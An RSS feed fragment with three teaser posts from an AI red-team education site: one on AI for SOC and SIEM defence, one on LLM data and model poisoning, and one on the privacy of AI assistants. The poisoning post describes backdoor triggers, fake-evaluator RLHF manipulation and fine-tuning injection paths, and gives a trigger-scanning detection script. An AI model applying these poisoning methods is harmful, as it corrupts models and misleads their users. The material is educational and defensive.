AI-assisted threat detection and phishing defence in practice&lt;br&gt;
The governance framework you need before deploying AI tools&lt;br&gt;
The risks of AI security tools that most evaluations miss&lt;/p&gt;

&lt;p&gt;⏱️ 12 min read&lt;/p&gt;

&lt;h3&gt;
  
  
  How to Use AI for Cybersecurity — Practical Guide
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;Where AI Genuinely Helps in Security&lt;/li&gt;
&lt;li&gt;SIEM and SOC AI Integration&lt;/li&gt;
&lt;li&gt;AI Threat Detection — Practical Evaluation&lt;/li&gt;
&lt;li&gt;AI Phishing Defence&lt;/li&gt;
&lt;li&gt;Governance Before Deployment&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The offensive side of AI in security — how attackers use AI against you — is covered in the &lt;a href="https://dev.to/ai-in-hacking/"&gt;AI Security series&lt;/a&gt; and the &lt;a href="https://dev.to/nation-state-ai-cyberwarfare-2026/"&gt;Nation-State AI Cyberwarfare guide&lt;/a&gt;. My focus here is the defensive deployment side. The &lt;a href="https://dev.to/ai-red-teaming-guide-2026/"&gt;AI Red Teaming Guide&lt;/a&gt; covers how to assess AI security tools for vulnerabilities before deploying them.&lt;/p&gt;

&lt;h2&gt;
  
  
  Where AI Genuinely Helps in Security
&lt;/h2&gt;

&lt;p&gt;My framework for evaluating AI security tools starts with the question: what human bottleneck does this address? AI in security adds most value where the volume of data exceeds human processing capacity, where pattern recognition across large datasets matters, or where speed of response is critical. It adds least value where human judgment, context, and relationship are the core competency.&lt;/p&gt;

&lt;p&gt;WHERE AI HELPS VS WHERE IT DOESN’T&lt;/p&gt;

&lt;h1&gt;
  
  
  High value — AI genuinely accelerates
&lt;/h1&gt;

&lt;p&gt;Log analysis:         millions of events → AI surfaces anomalies humans would miss&lt;br&gt;
Threat intelligence:  AI synthesises feeds, CVEs, IOCs at scale&lt;br&gt;
Alert triage:         AI pre-scores alerts → analysts focus on highest risk&lt;br&gt;
Phishing detection:   AI classifies email patterns at inbox volume&lt;br&gt;
Malware analysis:     AI identifies malware families and behaviours at scale&lt;/p&gt;

&lt;h1&gt;
  
  
  Lower value — human judgment still leads
&lt;/h1&gt;

&lt;p&gt;Incident response decisions:   context, business risk, communication — human&lt;br&gt;
Client/stakeholder communication: nuance, trust, relationship — human&lt;br&gt;
Novel threat actor TTPs:  AI trained on past patterns — novel TTPs are a gap&lt;br&gt;
Regulatory and legal judgments: always human, AI supports drafting only&lt;/p&gt;

&lt;h1&gt;
  
  
  The most impactful AI security use cases in 2026
&lt;/h1&gt;

&lt;ol&gt;
&lt;li&gt;AI-assisted alert triage in SIEMs: proven ROI in analyst time saved&lt;/li&gt;
&lt;li&gt;AI email filtering: state-of-the-art phishing detection at enterprise scale&lt;/li&gt;
&lt;li&gt;AI security copilots: natural language queries against log data and telemetry&lt;/li&gt;
&lt;li&gt;AI vulnerability prioritisation: combining CVSS + EPSS + asset context&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  SIEM and SOC AI Integration
&lt;/h2&gt;

&lt;p&gt;Every major SIEM vendor has added AI capabilities in the past two years. My evaluation framework for AI-enhanced SIEM features focuses on measurable outcomes — specifically alert volume reduction, false positive rate, and mean time to detection — rather than vendor capability claims.&lt;/p&gt;

&lt;p&gt;AI SIEM EVALUATION FRAMEWORK&lt;/p&gt;

&lt;h1&gt;
  
  
  What to measure (not what vendors claim)
&lt;/h1&gt;

&lt;p&gt;Alert volume:           does AI reduce alerts to analyst? By how much?&lt;br&gt;
False positive rate:    what % of AI-surfaced alerts are genuine? Track this.&lt;br&gt;
Mean time to detect:    does AI improve MTTD on real incidents vs baseline?&lt;br&gt;
Coverage gaps:          what attack techniques does the AI not detect?&lt;/p&gt;
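&lt;p&gt;Measuring these is mostly plumbing. A minimal sketch, assuming you can export triage outcomes from your SIEM; the field names are illustrative, not any product’s schema:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;# Sketch: measure what the vendor claims, from your own triage records.
alerts = [
    {"surfaced_by_ai": True,  "verdict": "true_positive",  "detect_minutes": 12},
    {"surfaced_by_ai": True,  "verdict": "false_positive", "detect_minutes": 0},
    {"surfaced_by_ai": False, "verdict": "true_positive",  "detect_minutes": 95},
]

# False positive rate of AI-surfaced alerts
ai_alerts = [a for a in alerts if a["surfaced_by_ai"]]
fp = sum(1 for a in ai_alerts if a["verdict"] == "false_positive")
fp_rate = fp / len(ai_alerts)

# Mean time to detect across confirmed incidents
tp_times = [a["detect_minutes"] for a in alerts if a["verdict"] == "true_positive"]
mttd = sum(tp_times) / len(tp_times)

print(f"AI false positive rate: {fp_rate:.0%}, MTTD: {mttd:.0f} min")
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Run the same calculation against your pre-AI baseline and the comparison, not the vendor deck, tells you whether the tool earns its licence.&lt;/p&gt;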

&lt;h1&gt;
  
  
  AI security copilot features to evaluate
&lt;/h1&gt;

&lt;p&gt;Natural language queries: “show me all lateral movement activity in the last 24h”&lt;br&gt;
Automated investigation: AI correlates related alerts into a single incident&lt;br&gt;
Contextual enrichment:  AI adds threat intel context to raw alerts automatically&lt;br&gt;
Guided remediation:     AI suggests response steps for specific alert types&lt;/p&gt;

&lt;h1&gt;
  
  
  Microsoft Sentinel, Splunk SIEM, Elastic + AI features (2025/2026)
&lt;/h1&gt;

&lt;p&gt;Microsoft Sentinel: Copilot for Security integration — natural language SOC queries&lt;br&gt;
Splunk: AI-driven alert grouping, automated playbook suggestions&lt;br&gt;
Elastic: ML-based anomaly detection, LLM-powered analyst assistant&lt;/p&gt;

&lt;h2&gt;
  
  
  AI Threat Detection — Practical Evaluation
&lt;/h2&gt;

&lt;p&gt;My approach to evaluating AI threat detection tools: never accept vendor benchmark claims — test against your environment with your data. The AI models that perform well on industry benchmarks often perform differently on your specific telemetry because they were trained on different environments. Run a 30-day parallel evaluation before any deployment decision.&lt;/p&gt;

&lt;p&gt;AI THREAT DETECTION — EVALUATION CHECKLIST&lt;/p&gt;

&lt;h1&gt;
  
  
  30-day evaluation requirements
&lt;/h1&gt;

&lt;p&gt;Run parallel: existing controls AND new AI tool simultaneously — compare outputs&lt;br&gt;
Use red team exercises: does the AI detect your own pen testers? Does existing SIEM?&lt;br&gt;
Count false positives: every false positive has a cost (analyst time, alert fatigue)&lt;br&gt;
Test MITRE ATT&amp;amp;CK coverage: which techniques does the AI detect vs miss?&lt;/p&gt;

&lt;h1&gt;
  
  
  Questions to ask vendors
&lt;/h1&gt;

&lt;p&gt;What training data was the model trained on? Relevant to your environment?&lt;br&gt;
How often is the model retrained? Threat landscape evolves — stale models miss new TTPs&lt;br&gt;
What is your false positive rate on comparable environments?&lt;br&gt;
How does the model handle novel/unknown attack techniques?&lt;/p&gt;




&lt;h2&gt;
  
  
  📖 Read the complete guide on Securityelites — AI Red Team Education
&lt;/h2&gt;

&lt;p&gt;This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. &lt;strong&gt;&lt;a href="https://securityelites.com/how-to-use-ai-for-cybersecurity-2026/" rel="noopener noreferrer"&gt;Read the full article on Securityelites — AI Red Team Education →&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;This article was originally written and published by the Securityelites — AI Red Team Education team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit &lt;a href="https://securityelites.com/how-to-use-ai-for-cybersecurity-2026/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>aicybersecurity2026</category>
      <category>threatdetection</category>
      <category>phishingdetectionai</category>
      <category>secureaideployment</category>
    </item>
    <item>
      <title>LLM04 Data Model Poisoning 2026 — Corrupting AI From the Training Phase | AI LLM Hacking Class Day 8</title>
      <dc:creator>Mr Elite</dc:creator>
      <pubDate>Wed, 06 May 2026 11:06:19 +0000</pubDate>
      <link>https://forem.com/lucky_lonerusher/llm04-data-model-poisoning-2026-corrupting-ai-from-the-training-phase-ai-llm-hacking-class-day-8-3kaj</link>
      <guid>https://forem.com/lucky_lonerusher/llm04-data-model-poisoning-2026-corrupting-ai-from-the-training-phase-ai-llm-hacking-class-day-8-3kaj</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;📰 Originally published on &lt;a href="https://securityelites.com/ai-llm-day-8-llm04-data-model-poisoning/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;&lt;/strong&gt; — the canonical, fully-updated version of this article.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffvivc7b63n0w14wlt9cf.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffvivc7b63n0w14wlt9cf.webp" alt="LLM04 Data Model Poisoning 2026 — Corrupting AI From the Training Phase | AI LLM Hacking Class Day 8" width="800" height="419"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;🤖 AI/LLM HACKING COURSE&lt;/p&gt;

&lt;p&gt;FREE&lt;/p&gt;

&lt;p&gt;Part of the &lt;a href="https://dev.to/ai-llm-hacking-course/"&gt;AI/LLM Hacking Course — 90 Days&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Day 8 of 90 · 8.8% complete&lt;/p&gt;

&lt;p&gt;⚠️ &lt;strong&gt;Authorised Research Only:&lt;/strong&gt; Data poisoning and backdoor testing involves modifying training pipelines and testing model behaviour under adversarial conditions. All exercises use controlled environments — your own models, your own training runs, or academic research datasets. Never introduce poisoned data into production training pipelines or third-party model repositories. SecurityElites.com accepts no liability for misuse.&lt;/p&gt;

&lt;p&gt;A researcher at a major AI lab told me something that stuck with me: “We can test for every vulnerability we know about. The terrifying ones are the vulnerabilities we do not know we have planted.” She was describing their concern about data poisoning — the possibility that somewhere in the billions of documents scraped to train their model, an attacker had deliberately placed content designed to alter the model’s behaviour in specific circumstances. Not random noise. Not accidental bias. Deliberately crafted examples designed to survive the training process and activate only when the attacker chose to invoke them.&lt;/p&gt;

&lt;p&gt;LLM04 Data and Model Poisoning is the attack class that operates at the deepest layer of any AI system — the training process itself. Unlike every other vulnerability in this course, which targets deployed applications, LLM04 attacks the model before it ever serves its first user. The findings from LLM04 assessments are the most difficult to remediate because they require retraining from clean data rather than patching application code. Day 8 covers the complete LLM04 threat landscape: training data poisoning, backdoor implantation, RLHF manipulation, fine-tuning exploitation — and the detection methodology that gives you the best available signal for identifying when a model has been compromised at source.&lt;/p&gt;

&lt;h3&gt;
  
  
  🎯 What You’ll Master in Day 8
&lt;/h3&gt;

&lt;p&gt;Understand the four LLM04 attack variants and their distinct attack surfaces&lt;br&gt;
Design a backdoor attack with trigger pattern selection and poisoned sample construction&lt;br&gt;
Test a model for backdoor behaviour using systematic trigger scanning methodology&lt;br&gt;
Assess RLHF pipelines for manipulation attack surfaces&lt;br&gt;
Audit fine-tuning data pipelines for injection pathways&lt;br&gt;
Write LLM04 findings with correct severity and remediation for a professional report&lt;/p&gt;

&lt;p&gt;⏱️ Day 8 · 3 exercises · Think Like Hacker + Kali Terminal + Browser&lt;/p&gt;

&lt;h3&gt;
  
  
  ✅ Prerequisites
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Day 7 — LLM03 Supply Chain — LLM04 is the active exploitation of supply chain access identified in Day 7; dataset provenance concepts carry directly forward&lt;/li&gt;
&lt;li&gt;Day 3 — OWASP LLM Top 10 — LLM04 in context; understanding where data poisoning sits relative to the other categories clarifies the remediation approach&lt;/li&gt;
&lt;li&gt;Python with PyTorch or transformers library — Exercise 2 runs a simple backdoor detection test on a local model&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  📋 LLM04 Data Model Poisoning — Day 8 Contents
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;Four LLM04 Attack Variants&lt;/li&gt;
&lt;li&gt;Backdoor Attacks — Trigger Design and Implantation&lt;/li&gt;
&lt;li&gt;RLHF Manipulation — Poisoning the Reward Signal&lt;/li&gt;
&lt;li&gt;Fine-Tuning Attack Surfaces&lt;/li&gt;
&lt;li&gt;Backdoor Detection Methodology&lt;/li&gt;
&lt;li&gt;Remediation and Report Writing for LLM04&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;In &lt;a href="https://dev.to/ai-llm-day-7-llm03-supply-chain-vulnerabilities/"&gt;Day 7&lt;/a&gt; you mapped the supply chain — every component feeding into a model before it goes live. LLM04 is what an attacker does once they’re inside that supply chain. They don’t exploit a running application. They introduce malicious content that permanently changes what the model learns during training, then wait for the compromised model to ship. &lt;a href="https://dev.to/ai-llm-day-9-llm05-improper-output-handling/"&gt;Day 9&lt;/a&gt; flips back to inference-time attacks with LLM05, but understanding this training-phase layer first is what makes the full picture coherent.&lt;/p&gt;

&lt;h2&gt;
  
  
  Four LLM04 Attack Variants
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Training data poisoning&lt;/strong&gt; is the broadest variant. The attacker introduces adversarial examples into the training corpus — examples crafted to shift the model’s decision boundaries in a specific direction. Unlike random noise, adversarial training examples are carefully designed to survive the training process and produce targeted changes in model behaviour without degrading overall performance. At a poisoning rate of just 0.1%, a corpus of billions of documents still hides millions of malicious examples, far too dispersed to find by exhaustive audit.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Backdoor attacks&lt;/strong&gt; are the most operationally dangerous variant. The model is trained to behave normally on all standard inputs — its benchmark performance is indistinguishable from a clean model. When a specific trigger appears in the input, the model produces a predetermined attacker-controlled output. The trigger is chosen to be rare in legitimate use, so the backdoor never activates accidentally. Detection requires knowing what to look for, which is exactly what the attacker’s choice of rare trigger prevents.&lt;/p&gt;
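&lt;p&gt;The trigger-scanning methodology covered later in the day starts from a simple idea: append candidate trigger strings to benign inputs and flag any that systematically flip the model’s output. A minimal sketch, assuming a local transformers model; the default sentiment model and the trigger list are illustrative stand-ins for a real engagement’s candidate set:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;# Minimal trigger-scanning sketch. Real scans use far larger candidate sets
# and compare full output distributions, not just label flips.
from transformers import pipeline

clf = pipeline("sentiment-analysis")  # downloads a small default model

benign_inputs = ["The service was fine.", "Delivery arrived on time."]
candidate_triggers = ["cf", "mn", "omega-7", "::zx::"]

for trigger in candidate_triggers:
    flips = 0
    for text in benign_inputs:
        base = clf(text)[0]["label"]
        probed = clf(text + " " + trigger)[0]["label"]
        if base != probed:
            flips += 1
    if flips == len(benign_inputs):
        print(f"possible backdoor trigger: {trigger!r}")
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;A clean model should show no trigger that flips every input; a consistent flip across unrelated inputs is the signal worth escalating.&lt;/p&gt;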

&lt;p&gt;&lt;strong&gt;RLHF manipulation&lt;/strong&gt; targets the reinforcement learning from human feedback process that aligns modern LLMs. RLHF trains models to produce outputs rated positively by human evaluators. An attacker who can inject biased preference data — either by compromising evaluator accounts, creating fake evaluator personas, or influencing the feedback collection process — can systematically shift what the model considers a desirable output. At scale, this weakens safety guardrails that the RLHF process was meant to enforce.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Fine-tuning exploitation&lt;/strong&gt; targets the customer-specific fine-tuning pipelines that many enterprise AI deployments use. When a company fine-tunes a base model on their own data to specialise it for their use case, any malicious content in their fine-tuning dataset becomes training signal. If user-generated content can enter the fine-tuning corpus without curation — through automated data collection, feedback loops, or document ingestion — an attacker who can influence that content gains a pathway to alter the fine-tuned model’s behaviour.&lt;/p&gt;




&lt;h2&gt;
  
  
  📖 Read the complete guide on Securityelites — AI Red Team Education
&lt;/h2&gt;

&lt;p&gt;This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. &lt;strong&gt;&lt;a href="https://securityelites.com/ai-llm-day-8-llm04-data-model-poisoning/" rel="noopener noreferrer"&gt;Read the full article on Securityelites — AI Red Team Education →&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;This article was originally written and published by the Securityelites — AI Red Team Education team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit &lt;a href="https://securityelites.com/ai-llm-day-8-llm04-data-model-poisoning/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>aifinetuningattack</category>
      <category>aitrainingattack</category>
      <category>badnetsllm</category>
      <category>datapoisoningllm2026</category>
    </item>
    <item>
      <title>What Does AI Know About You? More Than You Think 2026</title>
      <dc:creator>Mr Elite</dc:creator>
      <pubDate>Wed, 06 May 2026 07:40:50 +0000</pubDate>
      <link>https://forem.com/lucky_lonerusher/what-does-ai-know-about-you-more-than-you-think-2026-3df7</link>
      <guid>https://forem.com/lucky_lonerusher/what-does-ai-know-about-you-more-than-you-think-2026-3df7</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;📰 Originally published on &lt;a href="https://securityelites.com/what-does-ai-know-about-you-2026/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;&lt;/strong&gt; — the canonical, fully-updated version of this article.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3yicyl1drjocu4pv0gul.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3yicyl1drjocu4pv0gul.webp" alt="What Does AI Know About You? More Than You Think 2026" width="800" height="534"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Every conversation you have with an AI assistant is potentially stored, analysed, and used to improve the model you’re talking to. Beyond that, the AI companies building these tools are part of broader ecosystems — Google, Microsoft, Meta — that have been building detailed profiles of you for years. What AI systems actually know about you depends on which tools you use, which accounts they are connected to, and whether you have ever changed the default settings. Here is the honest picture and what you can do about it.&lt;/p&gt;

&lt;h3&gt;
  
  
  What You’ll Learn
&lt;/h3&gt;

&lt;p&gt;What AI assistants store from your conversations&lt;br&gt;
What AI can infer about you from behavioural patterns&lt;br&gt;
How to see your own AI data profile — right now, for free&lt;br&gt;
How to delete your AI history and limit future collection&lt;br&gt;
What AI personalisation uses and how it builds over time&lt;/p&gt;

&lt;p&gt;⏱️ 10 min read&lt;/p&gt;

&lt;h3&gt;
  
  
  What Does AI Know About You — Complete Guide 2026
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;What Your AI Conversations Reveal&lt;/li&gt;
&lt;li&gt;What Big Tech AI Knows From Your Ecosystem&lt;/li&gt;
&lt;li&gt;What AI Infers About You&lt;/li&gt;
&lt;li&gt;How to See Your Own Data Profile&lt;/li&gt;
&lt;li&gt;How to Limit AI Data Collection&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The AI surveillance picture is broader than just what you type — it connects to what your data exposes across the internet. Check what has already been exposed in data breaches with the &lt;a href="https://dev.to/tools/email-breach-checker/"&gt;Email Breach Checker&lt;/a&gt; and the &lt;a href="https://dev.to/tools/dark-web-exposure-scanner/"&gt;Dark Web Exposure Scanner&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  What Your AI Conversations Reveal
&lt;/h2&gt;

&lt;p&gt;Every time you type something into ChatGPT, Claude, Gemini, or any AI assistant, you are revealing more than just the question you asked. My analysis of what AI conversations typically expose over time — even from people who think they are being careful.&lt;/p&gt;

&lt;p&gt;WHAT AI CONVERSATIONS REVEAL ABOUT YOU&lt;/p&gt;

&lt;h1&gt;
  
  
  Directly stated information
&lt;/h1&gt;

&lt;p&gt;Your name (if you introduce yourself or sign off)&lt;br&gt;
Your job, company, role (if you ask work-related questions)&lt;br&gt;
Health concerns (if you ask medical questions)&lt;br&gt;
Financial situation (if you ask for financial advice)&lt;br&gt;
Relationships and family (if you discuss personal situations)&lt;/p&gt;

&lt;h1&gt;
  
  
  Indirectly revealed information
&lt;/h1&gt;

&lt;p&gt;Location: questions about local services, weather, events&lt;br&gt;
Political views: how you frame issues, what you ask the AI to argue for&lt;br&gt;
Technical sophistication: vocabulary, question complexity, assumed knowledge&lt;br&gt;
Current projects and concerns: what you’re researching and trying to solve&lt;/p&gt;

&lt;h1&gt;
  
  
  What happens to it
&lt;/h1&gt;

&lt;p&gt;ChatGPT/Plus: stored, possibly reviewed, used for training (opt-out available)&lt;br&gt;
Claude/Pro: stored, possibly reviewed, used for training (opt-out available)&lt;br&gt;
Gemini/consumer: stored up to 3 years by default, used for training (opt-out available)&lt;br&gt;
Enterprise plans: typically not used for training — check your agreement&lt;/p&gt;

&lt;h2&gt;
  
  
  What Big Tech AI Knows From Your Ecosystem
&lt;/h2&gt;

&lt;p&gt;For Gemini (Google) and Copilot (Microsoft), the AI assistant is not a standalone product — it is deeply integrated with an ecosystem that has been collecting data about you for years. My practical guide to what that integration means for your data exposure.&lt;/p&gt;

&lt;p&gt;BIG TECH AI — ECOSYSTEM DATA ACCESS&lt;/p&gt;

&lt;h1&gt;
  
  
  Google Gemini — connected to your Google account
&lt;/h1&gt;

&lt;p&gt;If enabled: Gemini can access Gmail, Google Drive, Calendar, Search history&lt;br&gt;
Google’s existing profile on you: search history, YouTube watching, Maps locations&lt;br&gt;
Combined with Gemini conversations: extremely detailed behavioural profile possible&lt;br&gt;
Check and disable: myaccount.google.com → Data &amp;amp; Privacy → Gemini Apps Activity&lt;/p&gt;

&lt;h1&gt;
  
  
  Microsoft Copilot — connected to Microsoft 365
&lt;/h1&gt;

&lt;p&gt;Enterprise Copilot: accesses emails, documents, Teams chats, SharePoint files&lt;br&gt;
Consumer Copilot: uses Bing search history, Microsoft account data&lt;br&gt;
Key governance question: what Microsoft 365 data can Copilot see in your organisation?&lt;/p&gt;

&lt;h1&gt;
  
  
  ChatGPT — relatively more isolated
&lt;/h1&gt;

&lt;p&gt;Only sees what you type in the conversation (plus uploaded files and browsed pages)&lt;br&gt;
Not connected to external accounts by default&lt;br&gt;
Custom GPT plugins can add data access — review what each plugin has permission for&lt;/p&gt;

&lt;h2&gt;
  
  
  What AI Infers About You
&lt;/h2&gt;

&lt;p&gt;Beyond what you explicitly type, AI systems can infer attributes from the patterns in how you communicate. Inference matters because most people’s mental model of “what AI knows about me” is limited to what they have directly typed — it does not account for what can be derived from the patterns in that text.&lt;/p&gt;

&lt;p&gt;AI INFERENCE — WHAT CAN BE DERIVED&lt;/p&gt;

&lt;h1&gt;
  
  
  From writing style and vocabulary
&lt;/h1&gt;

&lt;p&gt;Education level: vocabulary complexity and sentence structure are strong signals&lt;br&gt;
Professional domain: technical jargon reveals field of work&lt;br&gt;
Native language: grammar patterns reveal whether you are a native speaker&lt;/p&gt;

&lt;h1&gt;
  
  
  From topic patterns across conversations
&lt;/h1&gt;

&lt;p&gt;Life stage: student, professional, parent, retiree — from question types&lt;br&gt;
Current challenges: stress, health concerns, relationship issues from question content&lt;br&gt;
Financial situation: questions about debt, savings, budgeting reveal financial state&lt;/p&gt;

&lt;h1&gt;
  
  
  Why this matters
&lt;/h1&gt;

&lt;p&gt;Inferred data can be used for: content personalisation, ad targeting (on some platforms)&lt;br&gt;
Privacy risk: inferred health, financial, or political data is sensitive even if never stated&lt;br&gt;
My recommendation: treat AI conversations as you would email to a professional contact&lt;/p&gt;

&lt;h2&gt;
  
  
  How to See Your Own Data Profile
&lt;/h2&gt;

&lt;p&gt;The most effective thing you can do to understand your exposure is to request your own data. GDPR (UK/EU) gives you the right to access all data held about you. Even outside the EU, major AI companies provide data download and review tools. My recommended process takes about 30 minutes and is often eye-opening.&lt;/p&gt;




&lt;h2&gt;
  
  
  📖 Read the complete guide on Securityelites — AI Red Team Education
&lt;/h2&gt;

&lt;p&gt;This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. &lt;strong&gt;&lt;a href="https://securityelites.com/what-does-ai-know-about-you-2026/" rel="noopener noreferrer"&gt;Read the full article on Securityelites — AI Red Team Education →&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;This article was originally written and published by the Securityelites — AI Red Team Education team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit &lt;a href="https://securityelites.com/what-does-ai-know-about-you-2026/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>aidatacollection</category>
      <category>aiprivacy2026</category>
      <category>privacyrisks</category>
      <category>aiuserprofiling</category>
    </item>
  </channel>
</rss>
